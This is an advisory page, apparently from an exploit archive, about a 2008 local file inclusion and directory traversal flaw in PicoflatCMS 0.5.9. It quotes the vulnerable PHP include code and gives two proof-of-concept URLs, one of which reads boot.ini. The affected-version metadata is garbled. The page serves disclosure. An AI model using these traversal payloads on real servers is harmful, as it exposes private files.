Local File Inclusion and Directory Traversal in PicoflatCMS 0.5.9

vendor:

PicoflatCMS

by:

gmda

7.5

CVSS

HIGH

Local File Inclusion and Directory Traversal

CWE

Product Name: PicoflatCMS

Affected Version From: 2000.5.9

Affected Version To: 2000.5.9

Patch Exists: YES

Related CWE: N/A

CPE: a:picoflat:picoflatcms

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows

2008

Local File Inclusion and Directory Traversal in PicoflatCMS 0.5.9

PicoflatCMS 0.5.9 is vulnerable to Local File Inclusion and Directory Traversal. An attacker can exploit this vulnerability to gain access to sensitive files on the server, such as boot.ini. This is achieved by sending a specially crafted HTTP request containing directory traversal sequences (e.g. “/./././././././boot.ini”) to the vulnerable application. The vulnerable code is located in the “index.php” file, where the “$pagina” parameter is not properly sanitized before being used in a “include” statement.

Mitigation:

Input validation should be used to prevent directory traversal attacks. All user-supplied input should be validated and filtered for malicious characters.

Source

Exploit-DB raw data:

---------------------------------------------------------------------------
type attacak:Local File inclusion and that the possibility of a
Directory traversal Windows disclosure boot.ini

site name picoflatcms 0.5.9

download http://picoflat.altervista.org/index.php?

by gmda

<!-- gmda@email.it -->


---------------------------------------------------------------------------

bug code

<?php             if (eregi('://', $pagina) || eregi('\?', $pagina)) {
                $pagina = "";
                include "notfound.php";
            }else{
                include $pagina;             }
        ?>

p.o.c

http://127.0.0.1/path/index.php?pagina=/./././././././boot.ini

http://127.0.0.1/path/index.php?pagina=[file]

# milw0rm.com [2008-05-29]